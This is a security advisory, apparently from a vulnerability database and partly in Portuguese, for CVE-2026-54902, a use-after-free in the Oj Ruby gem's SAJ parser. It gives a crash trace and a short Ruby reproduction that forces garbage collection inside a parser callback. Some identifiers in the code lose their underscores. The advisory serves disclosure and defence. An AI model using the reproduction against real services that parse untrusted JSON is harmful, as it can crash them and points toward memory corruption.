PT-2026-51088 · Rubygems · Oj

Publicado

2026-06-19

·

Atualizado

2026-06-19

·

CVE-2026-54902

CVSS v4.0

8.7

Alta

VetorAV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

Oj::Parser in SAJ mode does not protect cached object keys (≥ 35 bytes) from garbage collection. A Ruby callback that triggers GC inside hash end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content).

Version

  • Software: oj gem
  • Affected: all versions with ext/oj/saj2.c / ext/oj/parser.c
  • Latest tested: 3.17.1 (confirmed present)

Details

Short keys (≤ 34 bytes) are stored inline on the C stack and are safe. Long keys (≥ 35 bytes) are stored as heap-allocated Ruby String objects passed to rb funcall as the key argument. Between the key being resolved and the callback completing, a GC triggered inside the callback (e.g. GC.start) can collect the key String, leaving a dangling VALUE.
Crash output:
long key trigger
[BUG] Segmentation fault at 0x0000000000004242
  close object+0x260  /ext/oj/usual.c:405 (calls rb funcall with freed key)
  parse+0x11ff     /ext/oj/parser.c:693
  parser parse+0x145  /ext/oj/parser.c:1408

RIP: 0x7fd1b46d68b7 RDI: 0x0000000000004242 (freed key VALUE)
R12: 0x0000000000004242
The freed VALUE 0x4242 shows the attacker-controlled content of the key string was loaded as a pointer — a classic use-after-free indicator.

Reproduce

ruby
require 'oj'

class H < Oj::Saj
 def add value(value, key)
  GC.start(full mark: true, immediate sweep: true) if key == 'x'
 end
 def hash start(key); end
 def hash end(key); end
end

p = Oj::Parser.new(:saj)
p.handler = H.new
p.parse('{"' + 'A' * 35 + '":{"x":1}}') # long outer key, GC fires on inner key

Correção

Use After Free

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-416

Identificadores relacionados

CVE-2026-54902
GHSA-M578-W5VF-RFCM

Produtos afetados

Oj